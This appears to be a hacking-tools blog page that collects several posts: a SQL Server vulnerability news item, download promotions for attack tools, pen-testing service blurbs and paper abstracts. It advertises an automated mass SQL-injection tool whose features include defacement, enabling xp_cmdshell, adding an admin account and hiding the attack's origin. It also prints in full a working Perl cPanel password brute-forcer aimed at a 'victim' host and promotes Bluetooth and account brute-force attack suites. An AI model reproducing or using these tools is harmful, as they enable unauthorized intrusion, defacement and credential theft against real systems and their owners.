Microsoft came clean and admitted its SQL Server database software is vulnerable to code injection attacks. It’s not a new flaw but the same bug in the database software that emerged around the time of Microsoft’s monthly Patch Tuesday update earlier this month.

In an advisory, Redmond’s security gnomes confirmed that code has been produced that exploits a security bug affecting Microsoft SQL Server 2000, Microsoft SQL Server 2005 and Windows Internal Database, in certain configurations.

On the plus side, Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3, and Microsoft SQL Server 2008 are immune from the flaw. Third party apps that make use of the vulnerable code also appear to be in the clear.

…..Click here to read more

So, if i’ve posted about this tool Here a few months ago. But today we have the latest version of this program.

Features

• Receives a list of URLs as input
• Recognizes the parameterized URLs from the list
• Fuzzes all URL parameters to concatenate the desired payload once an injection is successful
• Automatic defacement - you decide on the defacement content, be it a hidden script, or just pure old “cyber graffiti” fun
• OS command execution - remote enabling of XP_CMDSHELL on SQL server, subsequently running any arbitrary operating system command lines entered by the user
• Configurable parallel connections exponentially speed up the attack process - one payload, multiple targets, simultaneous attacks
• Optional use of an HTTP proxy to mask the origin of the attacks

CHANGELOG

• Automatic defacement - Try to concatenate a string to all user-defined text fields in DB
• Run any OS command as if you’re running a command console on the DB machine
• Execute SQL commands of your choice
• Enable OS shell procedure on DB - Revive the good old XP_CMDSHELL where it was turned off
• Add administrative user to DB server with password: T0pSeKret
• Enable remote desktop on DB server
• Fixed nvarchar cast to varchar. Verified against MS-SQL 2000
• Added numeric / string parameter type detection
• Improved defacement content handling by escaping quotation marks
• Improved support for Linux systems
• Fixed the “invalid number of concurrent connections” failure due to non-parameterized URLs

Download: Here

Read more: Here

In today’s increasingly interconnected business world, vulnerabilities present in an organisation’s technical infrastructure can lead to serious problems – the loss of trade secrets, damage to reputation or even breach of legal obligations to protect confidential information. A penetration test is designed to emulate real life attack motivations and techniques in order to provide a comprehensive register of vulnerabilities, weaknesses and exposures based on a specific scenario or threat, or focused on a subset of technical infrastructure.

The service can be tailored to meet the particular requirements of your organisation. In the most straightforward case a penetration test will take the form of a focused attack against a defined localised target such as a specific network. Our tests can also be modified to emulate a specific scenario, such as assessing the damage that a disgruntled employee could cause within your corporate network or determining the extent of access a completely anonymous attacker might be able to obtain without any prior knowledge of the target. Options such as social engineering, where appropriate, add the important human factor into the assessment and may also be incorporated.

Download: Here

Malware is software with malicious intent. Besides viruses and worms, spyware, adware, and other newer forms of malware have recently emerged as widely-spread threats to system security. It is difficult to detect malware reliably because new and polymorphic ones appear frequently. It is also difficult to remove malware and repair its damage to the system because some malware programs can extensively modify a system.

The authors propose a novel framework for automatically removing malware and repairing its damage to a system. The primary goal of their framework is to preserve system integrity.

Download: Here

Businesses evolve, grow and change. As part of this evolution IT applications are deployed, improved and optimised. These applications, be they websites, transactional systems or data entry applications, often deal with sensitive information and have a key role in marketing the brand of an organisation.
IRM’s Application Security Test provides a comprehensive assessment of the security posture of the application, detailing all vulnerabilities discovered, along with recommendations for mitigation and a clear indication of the risk posed by each issue.

Download: Here

A Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack and has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and a L2CAP packetgenerator.

Download: Here

Biometric systems comprise electronic devices and as such can utilise common electronic transports for the transmission of biometric related data. With biometric access control and indentification systems, users will typically present their biometric to a sensing device, which in turn may transmit data pertaining to that biometric to a server or secondary processing unit to perform biometric comparisons and auditing functions.

In this paper the authors realise a a proof-of-concept implementation of a biometric keylogger , or “Biologger”. While conventional keyloggers are typically used to obtain password or encryption keys to circumvent specific security measurs, the Biologger will aim to capture biometric-related data between a biometric device and other processing unints.

Download: Here

Here is the nice script written in Perl:

#!/usr/bin/perl<br /> # Cpanel Password Brute Forcer<br /> # —————————-<br /> # (c)oded By Hessam-x<br /> # Perl Version ( low speed )<br /> # Oerginal Advisory :<br /> # http://www.simorgh-ev.com/advisory/2…uteforce-vule/<br /> use IO::Socket;<br /> use LWP::Simple;<br /> use MIME::Base64;</p> <p> $host = $ARGV[0];<br /> $user = $ARGV[1];<br /> $port = $ARGV[2];<br /> $list = $ARGV[3];<br /> $file = $ARGV[4];<br /> $url = “http://”.$host.”:”.$port;<br /> if(@ARGV < 3){<br /> print q(<br /> ###############################################################<br /> # Cpanel Password Brute Force Tool #<br /> ###############################################################<br /> # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #<br /> #————————————————————-#<br /> # [Host] : victim Host (simorgh-ev.com) #<br /> # [User] : User Name (demo) #<br /> # [PORT] : Port of Cpanel (2082) #<br /> #[list] : File Of password list (list.txt) #<br /> # [File] : file for save password (password.txt) #<br /> # #<br /> ###############################################################<br /> # (c)oded By Hessam-x / simorgh-ev.com #<br /> ###############################################################<br /> );exit;}</p> <p> headx();</p> <p> $numstart = “-1″;</p> <p> sub headx() {<br /> print q(<br /> ###############################################################<br /> # Cpanel Password Brute Force Tool #<br /> # (c)oded By Hessam-x / simorgh-ev.com #<br /> ###############################################################<br /> );<br /> open (PASSFILE, “<$list”) || die “[-] Can’t open the List of password file !”;<br /> @PASSWORDS =<br /> ;<br /> close PASSFILE;<br /> foreach my $P (@PASSWORDS) {<br /> chomp $P;<br /> $passwd = $P;<br /> print “\n [~] Try Password : $passwd \n”;<br /> &brut;<br /> };<br /> }<br /> sub brut() {<br /> $authx = encode_base64($user.”:”.$passwd);<br /> print $authx;<br /> my $sock = IO::Socket::INET->new(Proto => “tcp”,PeerAddr => “$host”, PeerPort => “$port”) || print “\n [-] Can not connect to the host”;<br /> print $sock “GET / HTTP/1.1\n”;<br /> print $sock “Authorization: Basic $authx\n”;<br /> print $sock “Connection: Close\n\n”;<br /> read $sock, $answer, 128;<br /> close($sock);</p> <p> if ($answer =~ /Moved/) {<br /> print “\n [~] PASSWORD FOUND : $passwd \n”;<br /> exit();<br /> }<br /> }

Features:

• Bruteforce Attacks.
• List checker. (Check a list of words for premium account names.)
• AutoSave.
• More…

This require the .NET 2.0 Framework installed!

Download: Here

An all-star cast of authors analyze the top IT security threats for 2008 as selected by the editors and readers of Infosecurity Magazine. This book, compiled from the Syngress Security Library, is an essential reference for any IT professional managing enterprise security. It serves as an early warning system, allowing readers to assess vulnerabilities, design protection schemes and plan for disaster recovery should an attack occur. Topics include Botnets, Cross Site Scripting Attacks, Social Engineering, Physical and Logical Convergence, Payment Card Industry (PCI) Data Security Standards (DSS), Voice over IP (VoIP), and Asterisk Hacking.

Download: Here